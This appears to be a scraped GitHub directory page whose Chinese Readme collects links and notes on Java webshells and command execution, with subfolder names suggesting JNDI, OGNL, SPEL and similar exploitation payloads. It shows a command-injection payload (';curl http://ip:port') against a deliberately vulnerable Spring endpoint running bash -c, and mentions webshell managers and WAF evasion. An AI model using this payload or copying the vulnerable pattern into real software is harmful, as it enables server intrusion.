shell

偶然发现了一篇文章

https://xz.aliyun.com/t/7798

一种新型Java一句话木马的实现

命令执行的tips

https://www.anquanke.com/post/id/243329

https://xz.aliyun.com/t/7046

https://mp.weixin.qq.com/s?__biz=Mzg5MjQ1OTkwMg==&mid=2247483860&idx=1&sn=436dbdf49846851da5480e9e0c26ac23&chksm=c03c8fc5f74b06d3d6a8dba8726d4b82d811254073bbc75f982bd59f705c1e750178eddd3fe7&mpshare=1&scene=23&srcid=01302ApMKF6H7h71gWVIbJDN&sharer_sharetime=1643510224916&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd

其实说到底是java.lang.Runtime#exec(string)一个对命令进行了空格切分（导致切分不合本意），另一个string[]是自己去分离可以执行

下面代码是可以执行的

/cmd?command=;curl http://ip:port

@GetMapping(value = "/cmd")
public void cmd(@RequestParam String command) throws Exception {
    String[] c = { "/bin/bash","-c", "hacker "+ command };///bin/bash -c hacker;ls
    Process p = Runtime.getRuntime().exec(c);
}

下面是不能执行的

Command = "ping 127.0.0.1"+request.getParameter("cmd");
Runtime.getRuntime().exec(command);

webshell 管理工具

菜刀HTTP流量中转代理过WAF 现在来说就是bx和gsl了

Name	Name	Last commit message	Last commit date
parent directory ..
EL	EL
Elasticsearch_MVEL	Elasticsearch_MVEL
Expression	Expression
JNDI	JNDI
JNI	JNI
Jexl	Jexl
Jshell	Jshell
OGNL	OGNL
SPEL	SPEL
ScriptEngineManager	ScriptEngineManager
bypass	bypass
jndi	jndi
jrmp	jrmp
loadjar	loadjar
rmi-registry-bind	rmi-registry-bind
Readme.md	Readme.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Expand file tree

Readme.md

shell

命令执行的tips

webshell 管理工具

Search code, repositories, users, issues, pull requests...

FilesExpand file tree

shell

Directory actions

More options

Directory actions

More options

Latest commit

History

shell

Folders and files

parent directory

Readme.md

shell

命令执行的tips

webshell 管理工具

Expand file tree